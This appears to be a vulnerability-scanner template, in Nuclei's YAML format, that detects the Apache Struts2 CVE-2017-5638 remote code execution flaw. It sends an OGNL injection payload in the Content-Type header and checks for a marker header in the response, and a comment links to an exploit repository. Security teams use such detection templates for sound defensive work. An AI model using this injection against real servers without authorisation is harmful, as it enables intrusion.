31 lines
1.2 KiB
YAML
31 lines
1.2 KiB
YAML
id: CVE-2017-5638
|
||
info:
|
||
author: "Random Robbie"
|
||
name: "Struts2 RCE "
|
||
severity: critical
|
||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||
tags: cve,cve2017,struts,rce
|
||
|
||
# This template supports the detection part only.
|
||
# Do not test any website without permission
|
||
# Exploit:- https://github.com/mazen160/struts-pwn
|
||
|
||
|
||
requests:
|
||
- raw:
|
||
- |
|
||
GET / HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||
Accept-Language: en
|
||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||
Connection: Keep-Alive
|
||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
||
Pragma: no-cache
|
||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||
|
||
matchers:
|
||
- type: word
|
||
words:
|
||
- "X-Hacker: Bounty Plz"
|
||
part: header |